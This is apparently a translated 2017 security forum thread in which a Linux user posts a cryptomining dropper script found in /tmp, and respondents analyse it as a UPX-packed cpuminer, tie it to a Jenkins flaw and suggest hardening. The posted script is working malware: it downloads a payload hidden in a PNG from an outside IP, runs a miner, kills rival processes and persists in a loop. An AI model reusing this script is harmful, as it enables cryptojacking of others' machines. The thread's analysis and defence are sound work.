kworker34 malware su Linux

Naviga le tue risposte
6

Clam ha trovato questo file chiamato "kworker34" nella directory / tmp sulla mia macchina Linux Ubuntu. Ho prontamente cancellato questo file. Ho trovato anche un file di shell, kws.sh. Sembra che si stia connettendo a 2 indirizzi IP: uno in Russia e uno in Ucraina.

Qualcuno ha visto questo?

Questo è il contenuto di kwa.sh - 

#!/bin/sh
ps -fe|grep kworker34 |grep -v grep
if [ $? -ne 0 ]
then
echo "start process....."
cat /proc/cpuinfo|grep aes>/dev/null
if [ $? -ne 1 ]
then
wget 91.235.143.237/miu.png -O /tmp/conn
dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
else
wget -O /tmp/kworker34 http://91.235.143.237/kworker_na
fi
chmod +x /tmp/kworker34
nohup /tmp/kworker34  -B -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
else
echo "runing....."
fi
pkill -f conns
pkill -f irqbalance
crontab -l | sed '/91.230.47.40/d' | crontab -

sleepTime=20

while [ 0 -lt 1 ]
do
    ps -fe| grep kworker34 | grep -v grep
    if [ $? -ne 0 ]
    then
        echo "process not exists ,restart process now... "
                wget 91.235.143.237/miu.png -O /tmp/conn
                dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34
                chmod +x /tmp/kworker34
                nohup /tmp/kworker34 -a cryptonight -o stratum+tcp://185.154.52.74:80 -u 13 -p x >/dev/null 2>&1 &
        echo "restart done ..... "
    else
        echo "process exists , sleep $sleepTime seconds "
        pkill -f conns
        pkill -f irqbalance
        crontab -l | sed '/91.230.47.40/d' | crontab -
    fi
    sleep $sleepTime
done
    
posta Do Will 21.05.2017 - 21:26
fonte

4 risposte

12
... /tmp/kworker34 ... -o stratum+tcp://185.154.52.74:80 ...

Effettuare ricerche su google per strato + tcp indica che è in corso l'estrazione da criptovaluta. 

 wget 91.235.143.237/miu.png -O /tmp/conn
 dd if=/tmp/conn skip=7664 bs=1 of=/tmp/kworker34

Guardare più da vicino con file /tmp/kworker34 indica /tmp/kworker34: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped . Ciò significa che il file PNG viene utilizzato per trasportare un binario Linux.

strings /tmp/kworker34 dà tra un sacco di spazzatura: 

$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $

UPX packer è di per sé non male ma spesso utilizzato nel contesto del malware. Usando upx -d per decomprimere il file ed eseguire di nuovo strings su di esso rivela alcune stringhe interessanti: 

User-Agent: cpuminer/2.3.3
...
Try 'minerd --help' for more information.
Usage: minerd [OPTIONS]
  -o, --url=URL         URL of mining server
  -O, --userpass=U:P    username:password pair for mining server
  ...

Quindi questa è probabilmente la versione 2.3.3 di cpuminer come si può trovare su github e che è descritta come:

This is a multi-threaded CPU miner for Litecoin and Bitcoin, fork of Jeff Garzik's reference cpuminer.

Per ulteriori informazioni sull'argomento dei minatori indesiderati vedi Nuovo malware Linux installa Bitcoin Mining Software su dispositivo infetto e altri link .

    
risposta data 21.05.2017 - 22:08
fonte
5

Sì, recentemente è stata scoperta una certa vulnerabilità di Jenkins che consente di eseguire codice nell'istanza di Jenkins obsoleta, in genere mining dei programmi di criptovaluta Monero. Controlla questi link per maggiori informazioni:
link link

Installa la versione 2.46.2 / 2.57 o successiva di Jenkins per evitare l'infezione.

Btw. C'era una grande diffusione di minatori di malware Monero una settimana prima che WannaCry apparisse.

    
risposta data 01.06.2017 - 13:03
fonte
4

Ho scoperto che il processo viene eseguito con le credenziali dell'utente del server Jenkins build, quindi questo potrebbe essere un modo di infezione.

    
risposta data 26.05.2017 - 22:58
fonte
1

[Ho pensato di postare questa risposta come risposta, quindi aiuterà chiunque stia riscontrando questo problema]

Scavando in questo problema, questo è quello che penso stia accadendo. L'intruso stava usando un buco sulla mia applicazione per eseguire un comando per scaricare un file tar sulla mia directory / tmp. Quindi, esegue un comando per estrarre il contenuto del file tar. Il tar contiene un file di shell. Quindi, procede all'esecuzione del file di shell stesso.

Non sono ancora riuscito a trovare il buco nella mia applicazione che ha permesso all'intruso di intrufolarsi nello script sul mio sistema. Non penso sia troppo difficile scoprire come è arrivato. È solo che non ho avuto molto tempo per andare dopo. Ci arriverò presto e lo chiuderò fuori, di sicuro.

Nel frattempo, ho apportato alcune modifiche al mio sistema per impedirgli di scaricare ed eseguire uno script sul file system.

  • Modificata l'autorizzazione del comando "wget". È molto importante che Tomcat non venga eseguito come root. Non dare il permesso all'utente che sta eseguendo Tomcat per eseguire "wget".
  • La mia directory / tmp è stata creata come una semplice directory. L'ho modificato in una partizione montata da un file con le autorizzazioni nodev, noexec e nosuid.

Questi passaggi sembrano aver funzionato per tenere fuori l'intruso, per ora.

    
risposta data 07.06.2017 - 16:16
fonte

Leggi altre domande sui tag

Memorizza password usando sha1 [duplicato] Ha senso modificare una password con hash? [duplicare]